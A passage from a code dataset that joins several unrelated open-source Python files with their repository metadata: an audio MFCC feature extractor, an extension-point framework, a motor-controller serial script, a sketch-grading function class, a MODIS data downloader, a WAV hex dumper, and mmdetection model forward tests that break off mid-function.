0 for k in self.bads} cnt_scheduling_in_past = 0 mp_states = MediaPlayerStateIterator(recorded_events, self.events_definition) for st in mp_states: evname = st["evname"] if evname in counters: counters[evname] += 1 elif ("p.P.ut.1.9" and st["rescheduling_time"] is not None and st["rescheduling_time"] < 0): cnt_scheduling_in_past += 1 counters["scheduling_in_past"] = cnt_scheduling_in_past return counters
37.491071
88
0.609431
5d567e95c7601027cbc4d0f451a26ff9804ba951
835
py
Python
src/music_genre_mfcc.py
Cyofanni/music-genre-classification
05977e25146697426231017feff0624c09bdb96f
[ "MIT" ]
null
null
null
src/music_genre_mfcc.py
Cyofanni/music-genre-classification
05977e25146697426231017feff0624c09bdb96f
[ "MIT" ]
null
null
null
src/music_genre_mfcc.py
Cyofanni/music-genre-classification
05977e25146697426231017feff0624c09bdb96f
[ "MIT" ]
null
null
null
from scikits.talkbox.features import mfcc import scipy from scipy.io import wavfile import numpy as np import os import glob def write_ceps(ceps, filename): base_filename, ext = os.path.splitext(filename) data_filename = base_filename + ".ceps" np.save(data_filename, ceps) print("Written %s" % data_filename) def create_ceps(fn): s_rate, X = scipy.io.wavfile.read(fn) ceps, mspec, spec = mfcc(X) write_ceps(ceps, fn) def read_ceps(genre_list, base_dir): X, y = [], [] for l, g in enumerate(genre_list): for fn in glob.glob(os.path.join(base_dir, g, "*.ceps.npy")): ceps = np.load(fn) num_ceps = len(ceps) X.append(np.mean(ceps[int(num_ceps*1/10):int(num_ceps*9/10)], axis=0)) #X.append(np.mean(ceps, axis=0)) #doesn't help, it only increases running time y.append(l) return np.array(X), np.array(y)
26.09375
83
0.702994
b9e92d29f53986ccc9ec9da4292db3cf2da5d11e
4,961
py
Python
corehq/extensions/interface.py
dimagilg/commcare-hq
ea1786238eae556bb7f1cbd8d2460171af1b619c
[ "BSD-3-Clause" ]
1
2020-07-14T13:00:23.000Z
2020-07-14T13:00:23.000Z
corehq/extensions/interface.py
dimagilg/commcare-hq
ea1786238eae556bb7f1cbd8d2460171af1b619c
[ "BSD-3-Clause" ]
94
2020-12-11T06:57:31.000Z
2022-03-15T10:24:06.000Z
corehq/extensions/interface.py
dimagilg/commcare-hq
ea1786238eae556bb7f1cbd8d2460171af1b619c
[ "BSD-3-Clause" ]
null
null
null
import importlib import inspect import itertools import logging from enum import Enum from dimagi.utils.logging import notify_exception logger = logging.getLogger("commcare.extensions") class ExtensionError(Exception): pass class ResultFormat(Enum): FLATTEN = 'flatten' FIRST = 'first' def flatten_results(point, results): return list(itertools.chain.from_iterable(results)) def first_result(point, results): try: return next(results) except StopIteration: pass RESULT_FORMATTERS = { ResultFormat.FIRST: first_result, ResultFormat.FLATTEN: flatten_results } class Extension: def __init__(self, point, callable_ref, domains): self.point = point self.callable = callable_ref self.domains = set(domains) if domains else None def validate(self, expected_args): spec = inspect.getfullargspec(self.callable) unconsumed_args = set(expected_args) - set(spec.args) if unconsumed_args and not spec.varkw: raise ExtensionError(f"Not all extension point args are consumed: {unconsumed_args}") def should_call_for_domain(self, domain): return self.domains is None or domain in self.domains def __call__(self, *args, **kwargs): return self.callable(*args, **kwargs) def __repr__(self): return f"{self.callable}" class ExtensionPoint: def __init__(self, manager, name, definition_function, result_formatter=None): self.manager = manager self.name = name self.definition_function = definition_function self.providing_args = inspect.getfullargspec(definition_function).args self.extensions = [] self.result_formatter = result_formatter self.__doc__ = inspect.getdoc(definition_function) def extend(self, impl=None, *, domains=None): def _extend(impl): if self.manager.locked: raise ExtensionError( "Late extension definition. Extensions must be defined before setup is complete" ) if not callable(impl): raise ExtensionError(f"Extension point implementation must be callable: {impl!r}") extension = Extension(self.name, impl, domains) extension.validate(self.providing_args) self.extensions.append(extension) return impl if domains is not None and not isinstance(domains, list): raise ExtensionError("domains must be a list") if domains is not None and "domain" not in self.providing_args: raise ExtensionError("domain filtering not supported for this extension point") return _extend if impl is None else _extend(impl) def __call__(self, *args, **kwargs): callargs = inspect.getcallargs(self.definition_function, *args, **kwargs) domain = callargs.get('domain') extensions = [ extension for extension in self.extensions if not domain or extension.should_call_for_domain(domain) ] results = self._get_results(extensions, *args, **kwargs) if self.result_formatter: return self.result_formatter(self, results) return list(results) def _get_results(self, extensions, *args, **kwargs): for extension in extensions: try: result = extension(*args, **kwargs) if result is not None: yield result except Exception: # noqa notify_exception( None, message="Error calling extension", details={ "extention_point": self.name, "extension": extension, "kwargs": kwargs }, ) class CommCareExtensions: def __init__(self): self.registry = {} self.locked = False def extension_point(self, func=None, *, result_format=None): """Decorator for creating an extension point.""" def _decorator(func): if not callable(func): raise ExtensionError(f"Extension point must be callable: {func!r}") name = func.__name__ formatter = RESULT_FORMATTERS[result_format] if result_format else None point = ExtensionPoint(self, name, func, result_formatter=formatter) self.registry[name] = point return point return _decorator if func is None else _decorator(func) def load_extensions(self, implementations): for module_name in implementations: self.resolve_module(module_name) self.locked = True def add_extension_points(self, module_or_name): self.resolve_module(module_or_name) def resolve_module(self, module_or_name): if isinstance(module_or_name, str): importlib.import_module(module_or_name)
32.854305
100
0.636767
5089a76de2298aeb14b6115ce1c88c159d7cce5e
720
py
Python
motor_control.py
cpu-robotics/Clyde
345d757a5410cd4903764146c86b4f14af14a797
[ "MIT" ]
null
null
null
motor_control.py
cpu-robotics/Clyde
345d757a5410cd4903764146c86b4f14af14a797
[ "MIT" ]
null
null
null
motor_control.py
cpu-robotics/Clyde
345d757a5410cd4903764146c86b4f14af14a797
[ "MIT" ]
1
2019-04-18T18:24:44.000Z
2019-04-18T18:24:44.000Z
#!/usr/bin/env python """motor_control.py: Motor control via a Sabertooth 2x25 motor controller """ __author__ = "Nick Vazquez" __copyright__ = "Copyright 2020, Davenport Central Robotics Teams" # Import all Necessary Classes import serial import math import functions # Used for the verification of the baud rate by the motor controller rateVerify = '170' # Open a serial terminal with the port 'dev/tty0' drive = serial.Serial(port='/dev/tty0') # Print the name of the port that was connected to for verification print(drive.name) # Used by the Sabertooth motor controller to autodetect the Baud Rate used by the transmitting device drive.write(rateVerify) functions.trackDrive(130, 127, 'forward', 127)
28.8
101
0.768056
baa184074dfb98baf0749a0a48d296f3cf4e9a22
8,129
py
Python
grader_lib/datalayer.py
rmok57/sketchresponse
1bc8123cc6e21137c6b5cc15719ba26ad41bcd54
[ "MIT" ]
11
2016-06-28T13:35:03.000Z
2021-07-07T06:14:07.000Z
grader_lib/datalayer.py
rmok57/sketchresponse
1bc8123cc6e21137c6b5cc15719ba26ad41bcd54
[ "MIT" ]
37
2016-06-29T13:16:38.000Z
2022-02-27T01:18:08.000Z
grader_lib/datalayer.py
rmok57/sketchresponse
1bc8123cc6e21137c6b5cc15719ba26ad41bcd54
[ "MIT" ]
4
2017-10-16T19:35:28.000Z
2020-08-12T16:17:03.000Z
# """Contains functions and classes for processing function data""" from __future__ import division from __future__ import absolute_import import numpy as np from .Tag import Tag, Tagables DEGREES = (3.142/180) import sys from . import Gradeable # helper methods for interface-like class def _functionId(obj, nFramesUp): """ Create a string naming the function n frames up on the stack. """ fr = sys._getframe(nFramesUp+1) co = fr.f_code return "%s.%s" % (obj.__class__, co.co_name) def abstractMethod(obj=None): """ Use this instead of 'pass' for the body of abstract methods. """ raise Exception("Unimplemented abstract method: %s" % _functionId(obj, 1)) # Function "interface" class Function(Tag, Tagables, object): """Base class for Functions.""" # create the Function # establishes the axes, the size (from the axes), and the tolerance, with default tolerance of 20 pixels # Function info will be stored in terms of the function itself, not the pixel information # the actual path is yet to be specified def __init__(self, xaxis, yaxis, path_info = [], tolerance = dict()): super(Function, self).__init__() self.xaxis = xaxis self.yaxis = yaxis self.width = xaxis.pixels self.height = yaxis.pixels self.xscale = 1.0 * self.width / (xaxis.domain[1] - xaxis.domain[0]) self.yscale = 1.0 * self.height / (yaxis.domain[0] - yaxis.domain[1]) self.tolerance = tolerance self.set_default_tolerance('pixel', 20) self.set_default_tolerance('comparison', 20) self.create_from_path_info(path_info) # check if it is a function, and do something it is not # helper methods for constructor def set_default_tolerance(self, key, default_value): if key not in self.tolerance: self.tolerance[key] = default_value def set_tolerance(self, key, value): self.tolerance[key] = value # sets the variables related to the path, and finds the domain def create_from_path_info(self, path_info): abstractMethod(self) self.domain = [] ## methods to handle pixel <-> math conversions def xval_to_px(self, xval): return self.xaxis.coord_to_pixel(xval) def px_to_xval(self, px): return self.xaxis.pixel_to_coord(px) def yval_to_px(self, yval): return self.yaxis.coord_to_pixel(yval) def px_to_yval(self, px): return self.yaxis.pixel_to_coord(px) ## methods for getting various properties of the function at certain locations # done in math space, not pixel space def is_between(self, xmin, xmax): [xleft, xright] = self.domain if xleft > xmax or xright < xmin: return False else: return True def between_vals(self, xmin, xmax): xleft = max(xmin, self.domain[0]) xright = min(xmax, self.domain[1]) # print 'bv', xmin, xmax, xleft, xright return xleft, xright def get_value_at(self, xval): abstractMethod(self) def get_angle_at(self, xval): abstractMethod(self) def get_slope_at(self, xval): abstractMethod(self) # def get_mean_value_between(self, xmin, xmax): # abstractMethod(self) def get_min_value_between(self, xmin, xmax): abstractMethod(self) def get_max_value_between(self, xmin, xmax): abstractMethod(self) def get_mean_angle_between(self, xmin, xmax): # angle = np.arctan2(self.get_value_at(xmax) - self.get_value_at(xmin), xmax - xmin) # return angle abstractMethod(self) def get_min_angle_between(self, xmin, xmax): abstractMethod(self) def get_max_angle_between(self, xmin, xmax): abstractMethod(self) def get_horizontal_line_crossings(self, yval): abstractMethod(self) def get_vertical_line_crossing(self, xval): abstractMethod(self) def get_domain(self): abstractMethod(self) ### Grader functions ### def is_a_function(self): abstractMethod(self) def has_value_y_at_x(self, y, x, yTolerance=None, xTolerance=None): """Return whether the function has the value y at x. Args: y: the target y value. x: the x value. yTolerance(default:None): the y-axis pixel distance within which the function value is accepted. xTolerance(default:None): the x-axis pixel distance within which the function value is accepted. Returns: bool: true if the function value at x is y within tolerances, otherwise false """ if yTolerance is None: yTolerance = self.tolerance['pixel'] / self.yscale else: yTolerance /= self.yscale if xTolerance is None: xTolerance = self.tolerance['pixel'] / self.xscale else: xTolerance /= self.xscale # if the min value of the function around the desired x is higher than the desired y # or if the max value of the function around the desired x is lower # then it fails # note that if the function is defined above and below the function, no matter how far apart, this will allow it # print 'y, x', y, x ymax = self.get_max_value_between(x - xTolerance, x + xTolerance) ymin = self.get_min_value_between(x - xTolerance, x + xTolerance) if ymax is not False and ymin is not False: return (ymax > y - yTolerance) and (ymin < y + yTolerance) else: return False def is_zero_at_x_equals_zero(self, yTolerance=None, xTolerance=None): """Return whether the function is zero at x equals zero. Args: yTolerance(default:None): the y-axis pixel distance within which the function value is accepted. xTolerance(default:None): the x-axis pixel distance within which the function value is accepted. Returns: bool: true if the function value at x equals zero is zero within tolerances, otherwise false """ return self.has_value_y_at_x(0, 0, yTolerance=yTolerance, xTolerance=xTolerance) def is_greater_than_y_between(self, y, xmin, xmax, tolerance=None): """Return whether function is always greater than y in the range xmin to xmax. Args: y: the target y value. xmin: the minimum x range value. xmax: the maximum x range value. tolerance(default:None): pixel distance tolerance. If None given uses default constant 'comparison'. Returns: bool: true if the minimum value of the function in the range (xmin,xmax) is greater than y within tolerances, otherwise false. """ if tolerance is None: tolerance = self.tolerance['comparison'] / self.yscale else: tolerance /= self.yscale return self.get_min_value_between(xmin, xmax) > y - tolerance def is_less_than_y_between(self, y, xmin, xmax, tolerance=None): """Return whether function is always less than y in the range xmin to xmax. Args: y: the target y value. xmin: the minimum x range value. xmax: the maximum x range value. tolerance(default:None): pixel distance tolerance. If None given uses default constant 'comparison'. Returns: bool: true if the maximum value of the function in the range (xmin,xmax) is less than y within tolerances, otherwise false. """ if tolerance is None: tolerance = self.tolerance['comparison'] / self.yscale else: tolerance /= self.yscale return self.get_max_value_between(xmin, xmax) < y + tolerance
34.888412
120
0.622217
906911366b550eafc1cb245f021457817db4acc0
796
py
Python
Collect/MOD17/NPP_yearly.py
TimHessels/watertools
77bb412a72f068d255d614f4f8a8f2cfb7d78a26
[ "Apache-2.0" ]
3
2021-01-26T11:21:31.000Z
2021-12-31T21:28:18.000Z
Collect/MOD17/NPP_yearly.py
TimHessels/watertools
77bb412a72f068d255d614f4f8a8f2cfb7d78a26
[ "Apache-2.0" ]
null
null
null
Collect/MOD17/NPP_yearly.py
TimHessels/watertools
77bb412a72f068d255d614f4f8a8f2cfb7d78a26
[ "Apache-2.0" ]
4
2019-01-02T06:45:55.000Z
2021-06-30T11:51:38.000Z
import sys from watertools.Collect.MOD17.DataAccessNPP import DownloadData def main(Dir, Startdate, Enddate, latlim, lonlim, cores=False, Waitbar = 1, hdf_library = None, remove_hdf = 1): """ This function downloads MOD17 yearly NPP data for the specified time interval, and spatial extent. Keyword arguments: Dir -- 'C:/file/to/path/' Startdate -- 'yyyy-mm-dd' Enddate -- 'yyyy-mm-dd' latlim -- [ymin, ymax] lonlim -- [xmin, xmax] cores -- amount of cores used Waitbar -- 1 (Default) will print a waitbar """ print('\nDownload yearly MODIS NPP data for period %s till %s' %(Startdate, Enddate)) DownloadData(Dir, Startdate, Enddate, latlim, lonlim, Waitbar, cores, hdf_library, remove_hdf) if __name__ == '__main__': main(sys.argv)
34.608696
112
0.680905
1ec2bb16d12a4319fb9ebbd0f7d282f1307b7658
250
py
Python
filterpy/wavhex.py
nyaxt/dmix
8407c977562aa6145f8c5827b3881c3eb51011a7
[ "MIT" ]
null
null
null
filterpy/wavhex.py
nyaxt/dmix
8407c977562aa6145f8c5827b3881c3eb51011a7
[ "MIT" ]
null
null
null
filterpy/wavhex.py
nyaxt/dmix
8407c977562aa6145f8c5827b3881c3eb51011a7
[ "MIT" ]
1
2018-08-12T18:47:05.000Z
2018-08-12T18:47:05.000Z
import sys import wave import struct wi = wave.open(sys.argv[1], 'r') # n = wi.getnframes() n = 100000 ai = struct.unpack('h'*n, wi.readframes(n)) bo = open(sys.argv[2], 'w') for e in ai: bo.write("%06x\n" % ((e * 0x100) & 0xffffff)) bo.close()
16.666667
47
0.616
f7ea22c849e88cb6ec23b7fce557889423f5588a
53
py
Python
tests/lif/if_not_eq.py
Mieschendahl/assignment-final-stub
19eea657fcc4f8a455c42028f34b918628514cc0
[ "MIT" ]
null
null
null
tests/lif/if_not_eq.py
Mieschendahl/assignment-final-stub
19eea657fcc4f8a455c42028f34b918628514cc0
[ "MIT" ]
1
2022-03-20T11:08:45.000Z
2022-03-20T11:08:45.000Z
tests/lif/if_not_eq.py
Mieschendahl/assignment-final-stub
19eea657fcc4f8a455c42028f34b918628514cc0
[ "MIT" ]
6
2022-03-13T13:10:25.000Z
2022-03-28T22:18:12.000Z
x = 1 print(777 if (not (x == input_int())) else 42)
17.666667
46
0.584906
dc06d60b56c47248c23fa36a24ac0adbdefc621f
22,110
py
Python
tests/test_models/test_forward.py
hmtrii/mmdetection
a998e0ac45118482b4a1fa320c2f0611f35fb0d1
[ "Apache-2.0" ]
null
null
null
tests/test_models/test_forward.py
hmtrii/mmdetection
a998e0ac45118482b4a1fa320c2f0611f35fb0d1
[ "Apache-2.0" ]
null
null
null
tests/test_models/test_forward.py
hmtrii/mmdetection
a998e0ac45118482b4a1fa320c2f0611f35fb0d1
[ "Apache-2.0" ]
null
null
null
# Copyright (c) OpenMMLab. All rights reserved. """pytest tests/test_forward.py.""" import copy from os.path import dirname, exists, join import numpy as np import pytest import torch def _get_config_directory(): """Find the predefined detector config directory.""" try: # Assume we are running in the source mmdetection repo repo_dpath = dirname(dirname(dirname(__file__))) except NameError: # For IPython development when this __file__ is not defined import mmdet repo_dpath = dirname(dirname(mmdet.__file__)) config_dpath = join(repo_dpath, 'configs') if not exists(config_dpath): raise Exception('Cannot find config path') return config_dpath def _get_config_module(fname): """Load a configuration as a python module.""" from mmcv import Config config_dpath = _get_config_directory() config_fpath = join(config_dpath, fname) config_mod = Config.fromfile(config_fpath) return config_mod def _get_detector_cfg(fname): """Grab configs necessary to create a detector. These are deep copied to allow for safe modification of parameters without influencing other tests. """ config = _get_config_module(fname) model = copy.deepcopy(config.model) return model def _replace_r50_with_r18(model): """Replace ResNet50 with ResNet18 in config.""" model = copy.deepcopy(model) if model.backbone.type == 'ResNet': model.backbone.depth = 18 model.backbone.base_channels = 2 model.neck.in_channels = [2, 4, 8, 16] return model def test_sparse_rcnn_forward(): config_path = 'sparse_rcnn/sparse_rcnn_r50_fpn_1x_coco.py' model = _get_detector_cfg(config_path) model = _replace_r50_with_r18(model) model.backbone.init_cfg = None from mmdet.models import build_detector detector = build_detector(model) detector.init_weights() input_shape = (1, 3, 100, 100) mm_inputs = _demo_mm_inputs(input_shape, num_items=[5]) imgs = mm_inputs.pop('imgs') img_metas = mm_inputs.pop('img_metas') # Test forward train with non-empty truth batch detector.train() gt_bboxes = mm_inputs['gt_bboxes'] gt_bboxes = [item for item in gt_bboxes] gt_labels = mm_inputs['gt_labels'] gt_labels = [item for item in gt_labels] losses = detector.forward( imgs, img_metas, gt_bboxes=gt_bboxes, gt_labels=gt_labels, return_loss=True) assert isinstance(losses, dict) loss, _ = detector._parse_losses(losses) assert float(loss.item()) > 0 detector.forward_dummy(imgs) # Test forward train with an empty truth batch mm_inputs = _demo_mm_inputs(input_shape, num_items=[0]) imgs = mm_inputs.pop('imgs') img_metas = mm_inputs.pop('img_metas') gt_bboxes = mm_inputs['gt_bboxes'] gt_bboxes = [item for item in gt_bboxes] gt_labels = mm_inputs['gt_labels'] gt_labels = [item for item in gt_labels] losses = detector.forward( imgs, img_metas, gt_bboxes=gt_bboxes, gt_labels=gt_labels, return_loss=True) assert isinstance(losses, dict) loss, _ = detector._parse_losses(losses) assert float(loss.item()) > 0 # Test forward test detector.eval() with torch.no_grad(): img_list = [g[None, :] for g in imgs] batch_results = [] for one_img, one_meta in zip(img_list, img_metas): result = detector.forward([one_img], [[one_meta]], rescale=True, return_loss=False) batch_results.append(result) # test empty proposal in roi_head with torch.no_grad(): # test no proposal in the whole batch detector.roi_head.simple_test([imgs[0][None, :]], torch.empty( (1, 0, 4)), torch.empty((1, 100, 4)), [img_metas[0]], torch.ones((1, 4))) def test_rpn_forward(): model = _get_detector_cfg('rpn/rpn_r50_fpn_1x_coco.py') model = _replace_r50_with_r18(model) model.backbone.init_cfg = None from mmdet.models import build_detector detector = build_detector(model) input_shape = (1, 3, 100, 100) mm_inputs = _demo_mm_inputs(input_shape) imgs = mm_inputs.pop('imgs') img_metas = mm_inputs.pop('img_metas') # Test forward train gt_bboxes = mm_inputs['gt_bboxes'] losses = detector.forward( imgs, img_metas, gt_bboxes=gt_bboxes, return_loss=True) assert isinstance(losses, dict) # Test forward test with torch.no_grad(): img_list = [g[None, :] for g in imgs] batch_results = [] for one_img, one_meta in zip(img_list, img_metas): result = detector.forward([one_img], [[one_meta]], return_loss=False) batch_results.append(result) @pytest.mark.parametrize( 'cfg_file', [ 'retinanet/retinanet_r50_fpn_1x_coco.py', 'guided_anchoring/ga_retinanet_r50_fpn_1x_coco.py', 'ghm/retinanet_ghm_r50_fpn_1x_coco.py', 'fcos/fcos_center_r50_caffe_fpn_gn-head_1x_coco.py', 'foveabox/fovea_align_r50_fpn_gn-head_4x4_2x_coco.py', # 'free_anchor/retinanet_free_anchor_r50_fpn_1x_coco.py', # 'atss/atss_r50_fpn_1x_coco.py', # not ready for topk 'reppoints/reppoints_moment_r50_fpn_1x_coco.py', 'yolo/yolov3_mobilenetv2_320_300e_coco.py', 'yolox/yolox_tiny_8x8_300e_coco.py' ]) def test_single_stage_forward_gpu(cfg_file): if not torch.cuda.is_available(): import pytest pytest.skip('test requires GPU and torch+cuda') model = _get_detector_cfg(cfg_file) model = _replace_r50_with_r18(model) model.backbone.init_cfg = None from mmdet.models import build_detector detector = build_detector(model) input_shape = (2, 3, 128, 128) mm_inputs = _demo_mm_inputs(input_shape) imgs = mm_inputs.pop('imgs') img_metas = mm_inputs.pop('img_metas') detector = detector.cuda() imgs = imgs.cuda() # Test forward train gt_bboxes = [b.cuda() for b in mm_inputs['gt_bboxes']] gt_labels = [g.cuda() for g in mm_inputs['gt_labels']] losses = detector.forward( imgs, img_metas, gt_bboxes=gt_bboxes, gt_labels=gt_labels, return_loss=True) assert isinstance(losses, dict) # Test forward test with torch.no_grad(): img_list = [g[None, :] for g in imgs] batch_results = [] for one_img, one_meta in zip(img_list, img_metas): result = detector.forward([one_img], [[one_meta]], return_loss=False) batch_results.append(result) def test_faster_rcnn_ohem_forward(): model = _get_detector_cfg( 'faster_rcnn/faster_rcnn_r50_fpn_ohem_1x_coco.py') model = _replace_r50_with_r18(model) model.backbone.init_cfg = None from mmdet.models import build_detector detector = build_detector(model) input_shape = (1, 3, 100, 100) # Test forward train with a non-empty truth batch mm_inputs = _demo_mm_inputs(input_shape, num_items=[10]) imgs = mm_inputs.pop('imgs') img_metas = mm_inputs.pop('img_metas') gt_bboxes = mm_inputs['gt_bboxes'] gt_labels = mm_inputs['gt_labels'] losses = detector.forward( imgs, img_metas, gt_bboxes=gt_bboxes, gt_labels=gt_labels, return_loss=True) assert isinstance(losses, dict) loss, _ = detector._parse_losses(losses) assert float(loss.item()) > 0 # Test forward train with an empty truth batch mm_inputs = _demo_mm_inputs(input_shape, num_items=[0]) imgs = mm_inputs.pop('imgs') img_metas = mm_inputs.pop('img_metas') gt_bboxes = mm_inputs['gt_bboxes'] gt_labels = mm_inputs['gt_labels'] losses = detector.forward( imgs, img_metas, gt_bboxes=gt_bboxes, gt_labels=gt_labels, return_loss=True) assert isinstance(losses, dict) loss, _ = detector._parse_losses(losses) assert float(loss.item()) > 0 @pytest.mark.parametrize( 'cfg_file', [ # 'cascade_rcnn/cascade_mask_rcnn_r50_fpn_1x_coco.py', 'mask_rcnn/mask_rcnn_r50_fpn_1x_coco.py', # 'grid_rcnn/grid_rcnn_r50_fpn_gn-head_2x_coco.py', # 'ms_rcnn/ms_rcnn_r50_fpn_1x_coco.py', # 'htc/htc_r50_fpn_1x_coco.py', # 'panoptic_fpn/panoptic_fpn_r50_fpn_1x_coco.py', # 'scnet/scnet_r50_fpn_20e_coco.py', # 'seesaw_loss/mask_rcnn_r50_fpn_random_seesaw_loss_normed_mask_mstrain_2x_lvis_v1.py' # noqa: E501 ]) def test_two_stage_forward(cfg_file): models_with_semantic = [ 'htc/htc_r50_fpn_1x_coco.py', 'panoptic_fpn/panoptic_fpn_r50_fpn_1x_coco.py', 'scnet/scnet_r50_fpn_20e_coco.py', ] if cfg_file in models_with_semantic: with_semantic = True else: with_semantic = False model = _get_detector_cfg(cfg_file) model = _replace_r50_with_r18(model) model.backbone.init_cfg = None # Save cost if cfg_file in [ 'seesaw_loss/mask_rcnn_r50_fpn_random_seesaw_loss_normed_mask_mstrain_2x_lvis_v1.py' # noqa: E501 ]: model.roi_head.bbox_head.num_classes = 80 model.roi_head.bbox_head.loss_cls.num_classes = 80 model.roi_head.mask_head.num_classes = 80 model.test_cfg.rcnn.score_thr = 0.05 model.test_cfg.rcnn.max_per_img = 100 from mmdet.models import build_detector detector = build_detector(model) input_shape = (1, 3, 128, 128) # Test forward train with a non-empty truth batch mm_inputs = _demo_mm_inputs( input_shape, num_items=[10], with_semantic=with_semantic) imgs = mm_inputs.pop('imgs') img_metas = mm_inputs.pop('img_metas') losses = detector.forward(imgs, img_metas, return_loss=True, **mm_inputs) assert isinstance(losses, dict) loss, _ = detector._parse_losses(losses) loss.requires_grad_(True) assert float(loss.item()) > 0 loss.backward() # Test forward train with an empty truth batch mm_inputs = _demo_mm_inputs( input_shape, num_items=[0], with_semantic=with_semantic) imgs = mm_inputs.pop('imgs') img_metas = mm_inputs.pop('img_metas') losses = detector.forward(imgs, img_metas, return_loss=True, **mm_inputs) assert isinstance(losses, dict) loss, _ = detector._parse_losses(losses) loss.requires_grad_(True) assert float(loss.item()) > 0 loss.backward() # Test forward test with torch.no_grad(): img_list = [g[None, :] for g in imgs] batch_results = [] for one_img, one_meta in zip(img_list, img_metas): result = detector.forward([one_img], [[one_meta]], return_loss=False) batch_results.append(result) cascade_models = [ 'cascade_rcnn/cascade_mask_rcnn_r50_fpn_1x_coco.py', 'htc/htc_r50_fpn_1x_coco.py', 'scnet/scnet_r50_fpn_20e_coco.py', ] # test empty proposal in roi_head with torch.no_grad(): # test no proposal in the whole batch detector.simple_test( imgs[0][None, :], [img_metas[0]], proposals=[torch.empty((0, 4))]) # test no proposal of aug features = detector.extract_feats([imgs[0][None, :]] * 2) detector.roi_head.aug_test(features, [torch.empty((0, 4))] * 2, [[img_metas[0]]] * 2) # test rcnn_test_cfg is None if cfg_file not in cascade_models: feature = detector.extract_feat(imgs[0][None, :]) bboxes, scores = detector.roi_head.simple_test_bboxes( feature, [img_metas[0]], [torch.empty((0, 4))], None) assert all([bbox.shape == torch.Size((0, 4)) for bbox in bboxes]) assert all([ score.shape == torch.Size( (0, detector.roi_head.bbox_head.fc_cls.out_features)) for score in scores ]) # test no proposal in the some image x1y1 = torch.randint(1, 100, (10, 2)).float() # x2y2 must be greater than x1y1 x2y2 = x1y1 + torch.randint(1, 100, (10, 2)) detector.simple_test( imgs[0][None, :].repeat(2, 1, 1, 1), [img_metas[0]] * 2, proposals=[torch.empty((0, 4)), torch.cat([x1y1, x2y2], dim=-1)]) # test no proposal of aug detector.roi_head.aug_test( features, [torch.cat([x1y1, x2y2], dim=-1), torch.empty((0, 4))], [[img_metas[0]]] * 2) # test rcnn_test_cfg is None if cfg_file not in cascade_models: feature = detector.extract_feat(imgs[0][None, :].repeat( 2, 1, 1, 1)) bboxes, scores = detector.roi_head.simple_test_bboxes( feature, [img_metas[0]] * 2, [torch.empty((0, 4)), torch.cat([x1y1, x2y2], dim=-1)], None) assert bboxes[0].shape == torch.Size((0, 4)) assert scores[0].shape == torch.Size( (0, detector.roi_head.bbox_head.fc_cls.out_features)) @pytest.mark.parametrize( 'cfg_file', ['ghm/retinanet_ghm_r50_fpn_1x_coco.py', 'ssd/ssd300_coco.py']) def test_single_stage_forward_cpu(cfg_file): model = _get_detector_cfg(cfg_file) model = _replace_r50_with_r18(model) model.backbone.init_cfg = None from mmdet.models import build_detector detector = build_detector(model) input_shape = (1, 3, 300, 300) mm_inputs = _demo_mm_inputs(input_shape) imgs = mm_inputs.pop('imgs') img_metas = mm_inputs.pop('img_metas') # Test forward train gt_bboxes = mm_inputs['gt_bboxes'] gt_labels = mm_inputs['gt_labels'] losses = detector.forward( imgs, img_metas, gt_bboxes=gt_bboxes, gt_labels=gt_labels, return_loss=True) assert isinstance(losses, dict) # Test forward test with torch.no_grad(): img_list = [g[None, :] for g in imgs] batch_results = [] for one_img, one_meta in zip(img_list, img_metas): result = detector.forward([one_img], [[one_meta]], return_loss=False) batch_results.append(result) def _demo_mm_inputs(input_shape=(1, 3, 300, 300), num_items=None, num_classes=10, with_semantic=False): # yapf: disable """Create a superset of inputs needed to run test or train batches. Args: input_shape (tuple): input batch dimensions num_items (None | List[int]): specifies the number of boxes in each batch item num_classes (int): number of different labels a box might have """ from mmdet.core import BitmapMasks (N, C, H, W) = input_shape rng = np.random.RandomState(0) imgs = rng.rand(*input_shape) img_metas = [{ 'img_shape': (H, W, C), 'ori_shape': (H, W, C), 'pad_shape': (H, W, C), 'filename': '<demo>.png', 'scale_factor': np.array([1.1, 1.2, 1.1, 1.2]), 'flip': False, 'flip_direction': None, } for _ in range(N)] gt_bboxes = [] gt_labels = [] gt_masks = [] for batch_idx in range(N): if num_items is None: num_boxes = rng.randint(1, 10) else: num_boxes = num_items[batch_idx] cx, cy, bw, bh = rng.rand(num_boxes, 4).T tl_x = ((cx * W) - (W * bw / 2)).clip(0, W) tl_y = ((cy * H) - (H * bh / 2)).clip(0, H) br_x = ((cx * W) + (W * bw / 2)).clip(0, W) br_y = ((cy * H) + (H * bh / 2)).clip(0, H) boxes = np.vstack([tl_x, tl_y, br_x, br_y]).T class_idxs = rng.randint(1, num_classes, size=num_boxes) gt_bboxes.append(torch.FloatTensor(boxes)) gt_labels.append(torch.LongTensor(class_idxs)) mask = np.random.randint(0, 2, (len(boxes), H, W), dtype=np.uint8) gt_masks.append(BitmapMasks(mask, H, W)) mm_inputs = { 'imgs': torch.FloatTensor(imgs).requires_grad_(True), 'img_metas': img_metas, 'gt_bboxes': gt_bboxes, 'gt_labels': gt_labels, 'gt_bboxes_ignore': None, 'gt_masks': gt_masks, } if with_semantic: # assume gt_semantic_seg using scale 1/8 of the img gt_semantic_seg = np.random.randint( 0, num_classes, (1, 1, H // 8, W // 8), dtype=np.uint8) mm_inputs.update( {'gt_semantic_seg': torch.ByteTensor(gt_semantic_seg)}) return mm_inputs def test_yolact_forward(): model = _get_detector_cfg('yolact/yolact_r50_1x8_coco.py') model = _replace_r50_with_r18(model) model.backbone.init_cfg = None from mmdet.models import build_detector detector = build_detector(model) input_shape = (1, 3, 100, 100) mm_inputs = _demo_mm_inputs(input_shape) imgs = mm_inputs.pop('imgs') img_metas = mm_inputs.pop('img_metas') # Test forward train detector.train() gt_bboxes = mm_inputs['gt_bboxes'] gt_labels = mm_inputs['gt_labels'] gt_masks = mm_inputs['gt_masks'] losses = detector.forward( imgs, img_metas, gt_bboxes=gt_bboxes, gt_labels=gt_labels, gt_masks=gt_masks, return_loss=True) assert isinstance(losses, dict) # Test forward test detector.eval() with torch.no_grad(): img_list = [g[None, :] for g in imgs] batch_results = [] for one_img, one_meta in zip(img_list, img_metas): result = detector.forward([one_img], [[one_meta]], rescale=True, return_loss=False) batch_results.append(result) def test_detr_forward(): model = _get_detector_cfg('detr/detr_r50_8x2_150e_coco.py') model.backbone.depth = 18 model.bbox_head.in_channels = 512 model.backbone.init_cfg = None from mmdet.models import build_detector detector = build_detector(model) input_shape = (1, 3, 100, 100) mm_inputs = _demo_mm_inputs(input_shape) imgs = mm_inputs.pop('imgs') img_metas = mm_inputs.pop('img_metas') # Test forward train with non-empty truth batch 